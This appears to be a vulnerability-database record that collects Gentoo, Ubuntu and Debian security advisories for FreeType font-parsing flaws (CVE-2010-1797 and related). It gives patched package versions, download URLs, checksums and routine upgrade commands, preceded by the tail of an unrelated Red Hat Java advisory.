https://www.redhat.com/security/data/cve/CVE-2014-0458.html
https://www.redhat.com/security/data/cve/CVE-2014-0460.html
https://www.redhat.com/security/data/cve/CVE-2014-0461.html
https://www.redhat.com/security/data/cve/CVE-2014-1876.html
https://www.redhat.com/security/data/cve/CVE-2014-2397.html
https://www.redhat.com/security/data/cve/CVE-2014-2398.html
https://www.redhat.com/security/data/cve/CVE-2014-2403.html
https://www.redhat.com/security/data/cve/CVE-2014-2412.html
https://www.redhat.com/security/data/cve/CVE-2014-2414.html
https://www.redhat.com/security/data/cve/CVE-2014-2421.html
https://www.redhat.com/security/data/cve/CVE-2014-2423.html
https://www.redhat.com/security/data/cve/CVE-2014-2427.html
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTTm2zXlSAg2UNWIIRAkZ8AJ4tQFSY3KSdfOiDJA5KJWO9IJa1BACeMLJ6
PQHHIgiQ5K7Q4/GEJAHNU94=
=9aj6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
|
|
var-201008-0172
|
Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted Adobe Type 1 Mac Font File (aka LWFN) font. FreeType is prone to multiple memory-corruption vulnerabilities and a stack-based buffer-overflow vulnerability.
Successful exploits may allow attackers to execute arbitrary code in the context of an application that uses the affected library. Failed exploit attempts will likely result in denial-of-service conditions. It can be used to rasterize and map characters into bitmaps and provide support for other font-related businesses.
Background
==========
FreeType is a high-quality and portable font engine. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All FreeType users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/freetype-2.4.8"
References
==========
[ 1 ] CVE-2010-1797
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1797
[ 2 ] CVE-2010-2497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2497
[ 3 ] CVE-2010-2498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2498
[ 4 ] CVE-2010-2499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2499
[ 5 ] CVE-2010-2500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2500
[ 6 ] CVE-2010-2519
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2519
[ 7 ] CVE-2010-2520
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2520
[ 8 ] CVE-2010-2527
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2527
[ 9 ] CVE-2010-2541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2541
[ 10 ] CVE-2010-2805
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2805
[ 11 ] CVE-2010-2806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2806
[ 12 ] CVE-2010-2807
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2807
[ 13 ] CVE-2010-2808
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2808
[ 14 ] CVE-2010-3053
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3053
[ 15 ] CVE-2010-3054
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3054
[ 16 ] CVE-2010-3311
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3311
[ 17 ] CVE-2010-3814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3814
[ 18 ] CVE-2010-3855
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3855
[ 19 ] CVE-2011-0226
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0226
[ 20 ] CVE-2011-3256
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3256
[ 21 ] CVE-2011-3439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3439
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-09.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ===========================================================
Ubuntu Security Notice USN-972-1 August 17, 2010
freetype vulnerabilities
CVE-2010-1797, CVE-2010-2541, CVE-2010-2805, CVE-2010-2806,
CVE-2010-2807, CVE-2010-2808
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libfreetype6 2.1.10-1ubuntu2.8
Ubuntu 8.04 LTS:
libfreetype6 2.3.5-1ubuntu4.8.04.4
Ubuntu 9.04:
libfreetype6 2.3.9-4ubuntu0.3
Ubuntu 9.10:
libfreetype6 2.3.9-5ubuntu0.2
Ubuntu 10.04 LTS:
libfreetype6 2.3.11-1ubuntu2.2
After a standard system update you need to restart your session to make
all the necessary changes.
Details follow:
It was discovered that FreeType did not correctly handle certain malformed
font files.
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.10-1ubuntu2.8.diff.gz
Size/MD5: 70961 d986f14b69d50fe1884e8dd5f9386731
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.10-1ubuntu2.8.dsc
Size/MD5: 719 a91985ecc92b75aa3f3647506bad4039
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.10.orig.tar.gz
Size/MD5: 1323617 adf145ce51196ad1b3054d5fb032efe6
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.8_amd64.deb
Size/MD5: 717794 f332d5b1974aa53f200e4e6ecf9df088
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.8_amd64.deb
Size/MD5: 440974 afa83868cc67cec692f72a9dc93635ff
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.8_amd64.deb
Size/MD5: 133902 dca56851436275285b4563c96388a070
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.8_amd64.udeb
Size/MD5: 251958 358627e207009dbe0c5be095e7bed18d
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.8_i386.deb
Size/MD5: 677592 ee43f5e97f31b8da57582dbdb1e63033
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.8_i386.deb
Size/MD5: 416328 ef092c08ba2c167af0da25ab743ea663
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.8_i386.deb
Size/MD5: 117302 b2633ed4487657fe349fd3de76fce405
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.8_i386.udeb
Size/MD5: 227436 f55ab8a9bb7e76ad743f6c0fa2974e64
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.8_powerpc.deb
Size/MD5: 708654 ee71c714e62e96a9af4cf7ba909142e6
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.8_powerpc.deb
Size/MD5: 431036 4f1c6a1e28d3a14b593bef37605119ab
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.8_powerpc.deb
Size/MD5: 134260 66ba7d95f551eaadb1bba5a56d76529d
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.8_powerpc.udeb
Size/MD5: 241726 d2c4f13b12c8280b1fad56cdc0965502
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.8_sparc.deb
Size/MD5: 683964 49df9101deb9a317229351d72b5804ec
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.8_sparc.deb
Size/MD5: 411982 efaca20d5deec9e51be023710902852b
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.8_sparc.deb
Size/MD5: 120138 ff723720ed499e40049e3487844b9db3
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.8_sparc.udeb
Size/MD5: 222676 71f172ba71fc507b04e5337d55b32ed6
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.5-1ubuntu4.8.04.4.diff.gz
Size/MD5: 40949 1cc5014da4db8200edb54df32561fcd0
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.5-1ubuntu4.8.04.4.dsc
Size/MD5: 907 7f698125814f4ca67a01b0a66d9bcfe9
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.5.orig.tar.gz
Size/MD5: 1536077 4a5bdbe1ab92f3fe4c4816f9934a5ec2
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.5-1ubuntu4.8.04.4_amd64.deb
Size/MD5: 694322 c740e1665d09a0c691163a543c8d650b
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.5-1ubuntu4.8.04.4_amd64.deb
Size/MD5: 362386 5b085e83764fcda129bede2c5c4ca179
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.5-1ubuntu4.8.04.4_amd64.deb
Size/MD5: 221392 dbebbbaffc086dccf550468fff1daa92
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.3.5-1ubuntu4.8.04.4_amd64.udeb
Size/MD5: 258454 f3903d4e43891753f3c6439cd862617f
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.5-1ubuntu4.8.04.4_i386.deb
Size/MD5: 663330 7601af27049730f0f7afcfa30244ae88
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.5-1ubuntu4.8.04.4_i386.deb
Size/MD5: 347172 de53a441e28e385598d20333ff636026
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.5-1ubuntu4.8.04.4_i386.deb
Size/MD5: 201266 c9c50bdc87d0a46fc43f3bbca26adec5
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.3.5-1ubuntu4.8.04.4_i386.udeb
Size/MD5: 243462 16bb61f604fe48a301f6faeaa094d266
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.5-1ubuntu4.8.04.4_lpia.deb
Size/MD5: 665120 bf0dcd13b8a171f6a740ca225d943e68
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.5-1ubuntu4.8.04.4_lpia.deb
Size/MD5: 347512 d2beee3ccf7fe0233825d46cc61ca62d
http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.5-1ubuntu4.8.04.4_lpia.deb
Size/MD5: 205560 7879f630a5356e3d6e9c0609e8008de9
http://ports.ubuntu.com/pool/universe/f/freetype/libfreetype6-udeb_2.3.5-1ubuntu4.8.04.4_lpia.udeb
Size/MD5: 244324 4e10fb5e68a78312eb02c69508120c6a
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.5-1ubuntu4.8.04.4_powerpc.deb
Size/MD5: 687156 6d36300396fa84d6f889147b0247f385
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.5-1ubuntu4.8.04.4_powerpc.deb
Size/MD5: 358086 06b9874cc9ba11fdb6feb10b0831e890
http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.5-1ubuntu4.8.04.4_powerpc.deb
Size/MD5: 235578 ce514bab4cbc028a0451742c38c633cd
http://ports.ubuntu.com/pool/universe/f/freetype/libfreetype6-udeb_2.3.5-1ubuntu4.8.04.4_powerpc.udeb
Size/MD5: 254526 d50f40a9421b52f4302c4d260170edb3
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.5-1ubuntu4.8.04.4_sparc.deb
Size/MD5: 658094 184f0f51023baa8ce459fababaa190d9
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.5-1ubuntu4.8.04.4_sparc.deb
Size/MD5: 332124 5aa036de5269896c893ea8f825329b84
http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.5-1ubuntu4.8.04.4_sparc.deb
Size/MD5: 199782 9323f9209333cf42114e97d3305d901c
http://ports.ubuntu.com/pool/universe/f/freetype/libfreetype6-udeb_2.3.5-1ubuntu4.8.04.4_sparc.udeb
Size/MD5: 227810 7657e99ad137ad5ce654b74cfbbfdc10
Updated packages for Ubuntu 9.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.9-4ubuntu0.3.diff.gz
Size/MD5: 44032 17b27322a6448d40599c55561209c940
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.9-4ubuntu0.3.dsc
Size/MD5: 1311 5124a4df7016a625a631c1ff4661aae9
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.9.orig.tar.gz
Size/MD5: 1624314 7b2ab681f1a436876ed888041204e478
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.9-4ubuntu0.3_amd64.deb
Size/MD5: 729408 788a2af765a8356c4a7c01e893695b0b
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-udeb_2.3.9-4ubuntu0.3_amd64.udeb
Size/MD5: 272950 a1f9a0ad0d036e5a14b073c139ce5408
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.9-4ubuntu0.3_amd64.deb
Size/MD5: 407052 bfd510dc0c46a0f25dd3329693ee66a8
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.9-4ubuntu0.3_amd64.deb
Size/MD5: 226474 9b8e6c521d8629b9b1db2760209460a3
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.9-4ubuntu0.3_i386.deb
Size/MD5: 697818 9176ee8649b8441333d7c5d9359c53a6
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-udeb_2.3.9-4ubuntu0.3_i386.udeb
Size/MD5: 257896 c26f46491d69a174fa9cad126a3201cf
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.9-4ubuntu0.3_i386.deb
Size/MD5: 392692 648d0605a187b74291b3233e5e4930e3
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.9-4ubuntu0.3_i386.deb
Size/MD5: 198834 0b41da08de5417a7db21e24e730e03d9
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.9-4ubuntu0.3_lpia.deb
Size/MD5: 698682 12c20dd647db986bd87a250d8706e8e8
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-udeb_2.3.9-4ubuntu0.3_lpia.udeb
Size/MD5: 257736 dee60e4b8a1824d2aa13364ec0f01602
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.9-4ubuntu0.3_lpia.deb
Size/MD5: 392978 e19bcc3c8c0cec76227c64843b01516a
http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.9-4ubuntu0.3_lpia.deb
Size/MD5: 201636 a558e986b6c6e878e115126e7d3a28a5
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.9-4ubuntu0.3_powerpc.deb
Size/MD5: 720040 70c8792cddd9cfe45480f8d760dd0163
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-udeb_2.3.9-4ubuntu0.3_powerpc.udeb
Size/MD5: 265790 b356a500845d045f431db6ef4db4f811
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.9-4ubuntu0.3_powerpc.deb
Size/MD5: 400532 91aa4eea6b8e9b67a721b552caab8468
http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.9-4ubuntu0.3_powerpc.deb
Size/MD5: 227834 fa22e303b8d06dfb99a8c3c1f2980061
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.9-4ubuntu0.3_sparc.deb
Size/MD5: 689244 dff22369b1bb07d4ef7c6d9f474149db
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-udeb_2.3.9-4ubuntu0.3_sparc.udeb
Size/MD5: 238164 cb1e597bd0065d2ffbad763a52088c1d
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.9-4ubuntu0.3_sparc.deb
Size/MD5: 372422 c6f36ae3119f8f17368d796943ba9908
http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.9-4ubuntu0.3_sparc.deb
Size/MD5: 201390 c3f108859375787b11190d3c5a1d966b
Updated packages for Ubuntu 9.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.9-5ubuntu0.2.diff.gz
Size/MD5: 43530 f78681f1641b93f34d41ff4d6f31eb71
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.9-5ubuntu0.2.dsc
Size/MD5: 1311 8a9a302e0a62f2dbe2a62aba456e2108
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.9.orig.tar.gz
Size/MD5: 1624314 7b2ab681f1a436876ed888041204e478
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.9-5ubuntu0.2_amd64.deb
Size/MD5: 731028 3b5ed0ad073cca0c1eee212b0e12f255
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-udeb_2.3.9-5ubuntu0.2_amd64.udeb
Size/MD5: 275110 a23822489a0d7d45152f341b86f0df20
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.9-5ubuntu0.2_amd64.deb
Size/MD5: 409362 ba180d650e17df6980ca09b8d1a109e1
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.9-5ubuntu0.2_amd64.deb
Size/MD5: 230774 a0a51691eefc0fb6e94d41c3282c3ab2
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.9-5ubuntu0.2_i386.deb
Size/MD5: 696892 ad2164ed812ccd9cf7829659cff219c7
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-udeb_2.3.9-5ubuntu0.2_i386.udeb
Size/MD5: 258710 c2d256e87eaee83ab83592247588bee7
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.9-5ubuntu0.2_i386.deb
Size/MD5: 393912 c8d04b785d17066229bab50a3c13e1af
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.9-5ubuntu0.2_i386.deb
Size/MD5: 195702 02aa03f1f62a61383d829b5bf494b7b0
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.9-5ubuntu0.2_lpia.deb
Size/MD5: 699382 ff8200917b43322062d2f3b5f3f6bab8
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-udeb_2.3.9-5ubuntu0.2_lpia.udeb
Size/MD5: 259348 0395bdbaf357d161d0f1d3b257ae4732
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.9-5ubuntu0.2_lpia.deb
Size/MD5: 394122 8481f2e278a5da28b28ef0fa79207662
http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.9-5ubuntu0.2_lpia.deb
Size/MD5: 198546 a3f0a848da83a64d14344b6744b33a90
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.9-5ubuntu0.2_powerpc.deb
Size/MD5: 719762 bd7185c852b151794c27f8c2ead4da94
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-udeb_2.3.9-5ubuntu0.2_powerpc.udeb
Size/MD5: 264578 58a77cbf2ae4c2a447a81cce72f6b8c5
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.9-5ubuntu0.2_powerpc.deb
Size/MD5: 399118 c943fa66513b862ccb6ac99699c9e33c
http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.9-5ubuntu0.2_powerpc.deb
Size/MD5: 203834 842dd94d9b3fad52c0b1b6489775d2ea
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.9-5ubuntu0.2_sparc.deb
Size/MD5: 691054 557de31093ac67c2dedec97e55998295
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-udeb_2.3.9-5ubuntu0.2_sparc.udeb
Size/MD5: 240534 f3c79ed9e84e7169851de3f432b613c3
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.9-5ubuntu0.2_sparc.deb
Size/MD5: 374982 e84af1b516f050ee9bdb93c213994943
http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.9-5ubuntu0.2_sparc.deb
Size/MD5: 195786 599978c8d9cff2525eba228c793833c3
Updated packages for Ubuntu 10.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.11-1ubuntu2.2.diff.gz
Size/MD5: 41646 9b97425327300eda74c492034fed50ad
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.11-1ubuntu2.2.dsc
Size/MD5: 1313 b7b625334a0d9c926bf34cc83dcc904c
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.11.orig.tar.gz
Size/MD5: 1709600 5aa22c0bc6aa3815b40a309ead2b9d1b
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.11-1ubuntu2.2_amd64.deb
Size/MD5: 739530 db9147ce9477b7ab22374f89d24b24ca
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-udeb_2.3.11-1ubuntu2.2_amd64.udeb
Size/MD5: 277536 35fc46f3c281aee82eeed4e00cfdacdc
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.11-1ubuntu2.2_amd64.deb
Size/MD5: 434932 1bf8e620c3008504b87354470e7be9a5
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.11-1ubuntu2.2_amd64.deb
Size/MD5: 221434 4b4fcbd633bf1b3c2151617adae44835
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.11-1ubuntu2.2_i386.deb
Size/MD5: 704694 f58601afde2b4bc257492762654cbf94
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-udeb_2.3.11-1ubuntu2.2_i386.udeb
Size/MD5: 260916 a540a7f9ae973bce66bbd3fdb9a4f849
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.11-1ubuntu2.2_i386.deb
Size/MD5: 419000 d4a78ce7ae146caa59b61f43b27d363c
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.11-1ubuntu2.2_i386.deb
Size/MD5: 188710 e94b4202fcfe184fdf81409fe610a42a
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.11-1ubuntu2.2_powerpc.deb
Size/MD5: 728090 5f2e98a54cb2a0ac03591c387aacf461
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-udeb_2.3.11-1ubuntu2.2_powerpc.udeb
Size/MD5: 266750 66bf2b146ab219d1b78e1887d0053f2a
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.11-1ubuntu2.2_powerpc.deb
Size/MD5: 424614 fd964644b45bbbc79729c9609c4b6bb8
http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.11-1ubuntu2.2_powerpc.deb
Size/MD5: 196686 b88a8cebff19c95b6c9c161f7d1bb472
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.11-1ubuntu2.2_sparc.deb
Size/MD5: 707164 bf26d7cb1aa3f759ca31510f92888053
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-udeb_2.3.11-1ubuntu2.2_sparc.udeb
Size/MD5: 250768 100b4d4b270421fb1dcb503c88b547e8
http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.11-1ubuntu2.2_sparc.deb
Size/MD5: 408132 b009cd0f1aafa500f8cc16273e9f2ed9
http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.11-1ubuntu2.2_sparc.deb
Size/MD5: 198302 504ec3da9ee2048391e2c4035d7149fc
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-2105-1 security@debian.org
http://www.debian.org/security/ Giuseppe Iuculano
September 07, 2010 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : freetype
Vulnerability : several
Problem type : local(remote)
Debian-specific: no
CVE Id(s) : CVE-2010-1797 CVE-2010-2541 CVE-2010-2805 CVE-2010-2806
CVE-2010-2807 CVE-2010-2808 CVE-2010-3053
Several vulnerabilities have been discovered in the FreeType font
library.
For the stable distribution (lenny), these problems have been fixed in
version 2.3.7-2+lenny3
For the unstable distribution (sid) and the testing distribution
(squeeze), these problems have been fixed in version 2.4.2-1
We recommend that you upgrade your freetype package.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Debian (stable)
- ---------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7-2+lenny3.diff.gz
Size/MD5 checksum: 39230 95a3841e7258573ca2d3e0075b8e7f73
http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7.orig.tar.gz
Size/MD5 checksum: 1567540 c1a9f44fde316470176fd6d66af3a0e8
http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7-2+lenny3.dsc
Size/MD5 checksum: 1219 2a2bf3d4568d92e2a48ebcda38140e73
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny3_alpha.deb
Size/MD5 checksum: 775278 2f2ca060588fc33b6d7baae02201dbd2
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny3_alpha.deb
Size/MD5 checksum: 412188 ad9537e93ed3fb61f9348470940f3ce5
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny3_alpha.udeb
Size/MD5 checksum: 296592 e689b1c4b6bd7779e44d1cd641be9622
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny3_alpha.deb
Size/MD5 checksum: 253786 287a98ca57139d4dee8041eba2881e3b
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny3_amd64.deb
Size/MD5 checksum: 713260 f1d4002e7b6d185ff9f46bc25d67c4c9
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny3_amd64.deb
Size/MD5 checksum: 223170 cb00f76d826be115243faa9dfd0b8a91
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny3_amd64.udeb
Size/MD5 checksum: 269796 40762e686138c27ac92b20174e67012e
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny3_amd64.deb
